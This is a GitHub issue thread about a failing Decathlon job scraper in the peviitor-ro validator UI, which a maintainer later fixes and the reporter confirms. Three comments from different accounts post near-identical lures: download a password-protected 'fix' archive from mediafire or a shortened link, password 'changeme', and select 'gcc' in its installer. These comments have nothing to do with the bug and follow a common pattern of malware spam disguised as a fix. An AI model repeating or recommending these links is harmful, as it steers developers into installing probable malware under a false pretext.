### ISSUE TITLE
Scraper for Decathlon is not running properly

### ISSUE THREAD

**Issue by Lore78** [peviitor-ro/validator-ui#278]
URL: https://admin.peviitor.ro/
Browser: Chrome
Device: Laptop
OS: Windows 11

**STEPS TO REPRODUCE:**

1. Open the URL in the browser.
2. Click on "Cont".
3. Click on "+" from "based_scraper_py".
4. Click on "decathlon.py" and run the scraper.

**EXPECTED RESULTS:**
The scraper runs without issues.

**ACTUAL RESULTS:**
The scraper is running, but an error pops up.

![image](https://github.com/user-attachments/assets/ba0af9a6-d07c-4933-be66-7cea5e378f50)

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by lalalaurentiu** [comment]
Fixed....

**Comment by Lore78** [comment]
Restesting was done and it worked properly.
